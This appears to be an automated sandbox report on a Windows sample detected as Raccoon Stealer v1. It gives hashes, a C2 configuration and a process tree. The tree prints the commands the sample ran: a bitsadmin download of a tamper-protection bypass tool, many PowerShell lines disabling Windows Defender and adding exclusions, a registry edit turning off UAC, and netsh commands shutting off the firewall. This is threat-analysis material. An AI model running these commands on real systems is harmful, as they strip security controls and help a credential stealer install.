Analysis
-
max time kernel
2s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12/01/2024, 13:25
Static task
static1
Behavioral task
behavioral1
Sample
56953f00e527964f9556247cfee99e71.exe
Resource
win7-20231215-en
General
-
Target
56953f00e527964f9556247cfee99e71.exe
-
Size
8.6MB
-
MD5
56953f00e527964f9556247cfee99e71
-
SHA1
460f2e879f6b32e2917a38f20478491da003e971
-
SHA256
88d0b7c12318d56331734f2e0f9c40d5aae3b35458d78b9f50a5f588f37315ec
-
SHA512
fbf82b42b782eae11425c1be23f60bdc7bb35b485386ef7082d0fa0da584133af884932d4e1513dabd8909ab83a598b0096af76cef7024fc04cf4fdbab24d311
-
SSDEEP
196608:sEH8sDE80CzUqgX91QRWpabS4TmOePf6oX/b3xXJKV1PBK3r8BAs+nnaqmU:uq7z8XsRWwbSHLf6oThXE1iiA/naqmU
Malware Config
Extracted
raccoon
1.7.3
0343d4da493d263f78921a8724ca6adf05347cfe
-
url4cnc
https://telete.in/jbitchsucks
Signatures
-
Raccoon Stealer V1 payload 4 IoCs
resource yara_rule behavioral1/memory/2592-346-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral1/memory/2592-348-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral1/memory/2592-342-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral1/memory/2592-340-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 1972 netsh.exe 2600 netsh.exe -
Executes dropped EXE 2 IoCs
pid Process 2216 56953f00e527964f9556247cfee99e71.tmp 2836 WinRAR_5.80_x86_x64.exe -
Loads dropped DLL 3 IoCs
pid Process 2164 56953f00e527964f9556247cfee99e71.exe 2216 56953f00e527964f9556247cfee99e71.tmp 2216 56953f00e527964f9556247cfee99e71.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe 56953f00e527964f9556247cfee99e71.tmp File created C:\Program Files (x86)\is-V1D8L.tmp 56953f00e527964f9556247cfee99e71.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 1312 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2572 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2216 56953f00e527964f9556247cfee99e71.tmp 2216 56953f00e527964f9556247cfee99e71.tmp -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2216 56953f00e527964f9556247cfee99e71.tmp -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2164 wrote to memory of 2216 2164 56953f00e527964f9556247cfee99e71.exe 28 PID 2216 wrote to memory of 2712 2216 56953f00e527964f9556247cfee99e71.tmp 29 PID 2216 wrote to memory of 2712 2216 56953f00e527964f9556247cfee99e71.tmp 29 PID 2216 wrote to memory of 2712 2216 56953f00e527964f9556247cfee99e71.tmp 29 PID 2216 wrote to memory of 2712 2216 56953f00e527964f9556247cfee99e71.tmp 29 PID 2216 wrote to memory of 2836 2216 56953f00e527964f9556247cfee99e71.tmp 36 PID 2216 wrote to memory of 2836 2216 56953f00e527964f9556247cfee99e71.tmp 36 PID 2216 wrote to memory of 2836 2216 56953f00e527964f9556247cfee99e71.tmp 36 PID 2216 wrote to memory of 2836 2216 56953f00e527964f9556247cfee99e71.tmp 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\56953f00e527964f9556247cfee99e71.exe"C:\Users\Admin\AppData\Local\Temp\56953f00e527964f9556247cfee99e71.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Users\Admin\AppData\Local\Temp\is-HDIV6.tmp\56953f00e527964f9556247cfee99e71.tmp"C:\Users\Admin\AppData\Local\Temp\is-HDIV6.tmp\56953f00e527964f9556247cfee99e71.tmp" /SL5="$30150,8340336,734720,C:\Users\Admin\AppData\Local\Temp\56953f00e527964f9556247cfee99e71.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\xRfMQDQl23QYqOY\5jayrzw1q.vbs"3⤵PID:2712
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\xRfMQDQl23QYqOY\avNIprUwIk.bat" "4⤵PID:1844
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵PID:2564
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe5⤵
- Download via BitsAdmin
PID:2572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""5⤵PID:2908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""5⤵PID:328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"5⤵PID:968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force5⤵PID:2172
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"5⤵PID:1312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"5⤵PID:2656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵PID:896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵PID:1916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵PID:1664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵PID:1044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵PID:1640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵PID:2344
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵PID:836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵PID:2744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵PID:2920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"5⤵PID:2432
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵PID:2528
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
PID:1972
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\xRfMQDQl23QYqOY\main.bat" "4⤵PID:736
-
C:\Windows\SysWOW64\mode.commode 65,105⤵PID:840
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵PID:1040
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵PID:1796
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵PID:2056
-
-
C:\ProgramData\xRfMQDQl23QYqOY\edhWjul.exe"edhWjul.exe"5⤵PID:1552
-
C:\ProgramData\xRfMQDQl23QYqOY\edhWjul.exe"C:\ProgramData\xRfMQDQl23QYqOY\edhWjul.exe"6⤵PID:2592
-
-
C:\ProgramData\xRfMQDQl23QYqOY\edhWjul.exe"C:\ProgramData\xRfMQDQl23QYqOY\edhWjul.exe"6⤵PID:2580
-
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵PID:2304
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵PID:868
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵PID:1984
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵PID:1544
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵PID:2440
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_9.zip -oextracted5⤵PID:2264
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_10.zip -oextracted5⤵PID:2404
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e extracted/file_11.zip -oextracted5⤵PID:1364
-
-
C:\ProgramData\xRfMQDQl23QYqOY\7z.exe7z.exe e file.zip -p___________26299pwd15425pwd19346___________ -oextracted5⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\xRfMQDQl23QYqOY\delXPDUR9c.bat" "4⤵PID:2096
-
-
-
C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe"C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe"3⤵
- Executes dropped EXE
PID:2836 -
C:\Windows\SysWOW64\route.exeroute.exe delete 95.141.193.1334⤵PID:660
-
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.1331⤵
- Modifies Windows Firewall
PID:2600
-
C:\Windows\SysWOW64\timeout.exetimeout /T 180 /NOBREAK1⤵
- Delays execution with timeout.exe
PID:1312
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
861KB
MD549f6c43af8d89166917b5bb1263e6b8d
SHA187c64dde44eca9815b59d69684eb4f3aa93c58bd
SHA256c3b00f481887aed3e0b1941bf18dfc391de98e2aca0e17fc3c15e8bdb3a77b11
SHA5121022d5cd39fcb63bb13c4bef3fcb04a2e07821b42dbb9facf291dd5a9b96edee910b8ec82573968865f1361108c1bb73fc10b5458eaaf2a383a866ccf44e4e9b
-
Filesize
897KB
MD52be77c8b6a9581a45abbc3019d319ae7
SHA119c72bd1ffc015e2d344a16977dc1832c65123fc
SHA2560f1c58e4de2d962d449321179706c37b633f296858f0720df14a452c677f24f3
SHA512ddbe53591838947051835c34baff9634512ed85244618e0395cf6ddbbc1d15b8998667a5e5d05dd9c2e35e68021158503576f49a99300fde73d169d2bb81ce72
-
Filesize
96KB
MD5c84933bcccf41369ef9ecce015b86ed0
SHA1624713276ae217d8d05c03598eecd31209c7f77a
SHA256ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363
-
Filesize
22KB
MD5b0a7842dd51df8942bc8b837282d1c2b
SHA10e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA2564a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6
-
Filesize
1.2MB
MD5f695b1a5a8885a67cd160399a9ac9207
SHA1bd2461560bbcc7ed72c8b496a30d8dc846d3512e
SHA2563b9b23cf6b4b766d52c220c1e392493bddc3f10b7c00c643cde842f589b419b7
SHA51249ea868dd5721782952805202a5240cbd37db6db39a66ac80c1476dd87c450f13806fba4b1d799e1e7982994d698c612ba8bb65b3e2266b3ec1fe67f966ad404
-
Filesize
860KB
MD57cef45981a4da88cbf3ff846a2b2b6ca
SHA1718c7bfa1f228954e05dc0b01cbdb0b8b8825ddd
SHA256485d53fa4aa89124bbfa72ec512ffde30f6d1e1cf01df0a55b0093ca06373028
SHA512b20d452a2d4e502538a235759efd0065b191e5116f79f384314faa4fab4627be9c4adf916f564382948d9f050c4d07e28383934b93d505a4da3e347e28c02d27
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
1.4MB
MD5991798f59eb22c92e3a559d30fbb0534
SHA18b2939ed047ddff365ee7073429d690a76073e94
SHA2561604c01fdfb99452604b8b1fc6a002e9d0c38a99ebc3693e10dd6794cf941907
SHA51288b7fe60898075f34413ef520c0a74eef5e00a87260ac52fb81d7b260b06003316df4481da6cf9c526ffe007c1733824b7b3a0817cb6e71f0b3e6aac98a8399e
-
Filesize
7KB
MD5f27689c513e7d12c7c974d5f8ef710d6
SHA1e305f2a2898d765a64c82c449dfb528665b4a892
SHA2561f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc